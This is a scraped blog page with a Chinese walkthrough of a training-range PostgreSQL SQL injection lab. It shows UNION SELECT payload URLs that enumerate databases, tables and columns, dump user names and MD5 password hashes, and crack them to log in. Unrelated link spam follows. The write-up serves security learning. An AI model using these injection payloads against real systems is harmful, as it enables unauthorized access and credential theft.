当前位置: 首页 > news >正文

html5视频网站源码电脑网站生成手机网站

news 2026/5/6 4:51:06
html5视频网站源码,电脑网站生成手机网站,wordpress 批量发文章,嘉兴企业网站排名优化———靶场专栏——— 声明#xff1a;文章由作者weoptions学习或练习过程中的步骤及思路#xff0c;非正式答案#xff0c;仅供学习和参考。 靶场背景#xff1a; 来源#xff1a; 墨者学院 简介#xff1a; 安全工程师墨者最近在练习SQL手工注入漏洞#… ———靶场专栏——— 声明文章由作者weoptions学习或练习过程中的步骤及思路非正式答案仅供学习和参考。 靶场背景 来源 墨者学院 简介 安全工程师墨者最近在练习SQL手工注入漏洞自己刚搭建好一个靶场环境NginxPHPPostgreSQLPHP代码对客户端提交的参数未做任何过滤。尽情的练习SQL手工注入吧。 实训目标 1.掌握SQL注入原理 2.了解手工注入的方法 3.了解PostgreSQL的数据结构 4.了解字符串的MD5加解密 解题方向 手工进行SQL注入测试获取管理密码登录。 解题思路 postgreSQL和mysql语法和数据库结构上有区别但整体思路区别不大。 还是熟悉的管理系统登陆界面还是熟悉的平台停机维护通知。 解题步骤 一、验证注入点 http://124.70.71.251:41459/new_list.php?id1 and 11 页面显示正常 报错一下看看 http://124.70.71.251:41459/new_list.php?id1 and 12 ok那注入点就是在这里了。 二、order by猜列 确定了四个字段。 三、测试回显 用select语句测一下回显。跟mysql有些不一样postgreSQL是用null来测试回显点的。 http://124.70.71.251:41459/new_list.php?id1 and 12 union select null,null,null,null 依次给每个null加上单引号。 http://124.70.71.251:41459/new_list.php?id1 and 12 union select null,null,null,null 第二个和第三个位置有回显接下来进行注入。 四、数据库信息获取 version()数据库版本 http://124.70.71.251:41459/new_list.php?id1 and 12 union select null,null,version(),null PostgreSQL 9.5.13 on x86_64-pc-linux-gnu, compiled by gcc (Ubuntu 5.4.0-6ubuntu1~16.04.9) 5.4.0 20160609, 64-bit current_user数据库用户 http://124.70.71.251:41459/new_list.php?id1 and 12 union select null,null,current_user,null postgres current_database()数据库名 http://124.70.71.251:41459/new_list.php?id1 and 12 union select null,null,current_database(),null mozhedvcms 五、查数据 ①查数据库名 http://124.70.71.251:41459/new_list.php?id1 and 12 union select null,null,string_agg(datname,,),null from pg_database template1,template0,postgres,mozhedvcms ②查表名 http://124.70.71.251:41459/new_list.php?id1 and 12 union select null,null,string_agg(tablename,,),null from pg_tables where schemanamepublic http://124.70.71.251:41459/new_list.php?id1 and 12 union select null,null,string_agg(relname,,),null from pg_stat_user_tables notice,reg_users ③查列名 http://124.70.71.251:41459/new_list.php?id1 and 12 union select null,null,string_agg(column_name,,),null from information_schema.columns where table_namereg_users id,name,password,status ④查数据 http://124.70.71.251:41459/new_list.php?id1 and 12 union select null,string_agg(name,,),string_agg(password,,),null from reg_users 六、MD5解密登陆 1mozhe1,085631f437f337ecbb741d2d9bb73b7d544041 2mozhe2,1c63129ae9db9c60c3e8aa94d3e004951qaz2wsx mozhe1成功登陆KEYmozhe2cf8a74af7074d9688e835190f9 总结 难度★★☆☆☆☆☆☆☆☆ 分析 很难评价直接就把不熟练写在了脸上了而且原理还是很模糊。
http://www.hkea.cn/news/14550609/

相关文章:

  • 怎样上传图片到自己公司网站如何办宽带
  • 视频网站的建设目标dw做的网站怎么让别人看到
  • 网站初始开发的步骤网站代码在哪里写
  • 手机网站菜单代码文明seo技术教程网
  • 音乐网站建设教程视频wordpress 新浪代码
  • 个人做网站公司企业网站建设费是无形资产吗
  • 做外贸去哪个网站找客户唐山室内设计公司排名
  • 美术网站建设方案有什么做视频的素材网站
  • 电子商务网站的建设报告随州哪里有网络推广方案
  • 郑州做网站 码通怎么制作网站外链
  • 网站建设报价模块在哪查网站备案
  • 网络广告网站网上做广告推广
  • 网站推广策略和营销策略建立平台需要多少钱
  • 做门户网站需要准备什么wordpress页面文件夹
  • 网站需求建设关系书wordpress图片主题演示
  • 网站的服务器每年都要续费的吗国外做美食视频网站
  • 沈阳做网站客户多吗做企业网站需要自己有公司吗
  • 充值选建设银行打不开网站WordPress图片裁减
  • 怎么用花生壳做网站wordpress怎么使用七牛
  • 学院网站开发网站定位软文推广的标准类型
  • 电商后台管理网站模板seo推广专员工作好做吗
  • 怎么做平台网站聊城网站建设哪个好
  • 网站建设推广信息好看模板大全
  • 淄博市沂源县建设局网站漳州台商投资建设局网站
  • 网站如何创建首页南昌模板建站代理
  • 级a做爰片免费视网站看看东莞网络公司招聘信息
  • 如何查询自己的网站是否被收录怎么看网站开发的好坏
  • 开发员给我用织梦做的网站广告营销模式
  • 怎么做网站源代码黄浦网站制作
  • 建设旅游网站系统网站建设合同印花税税率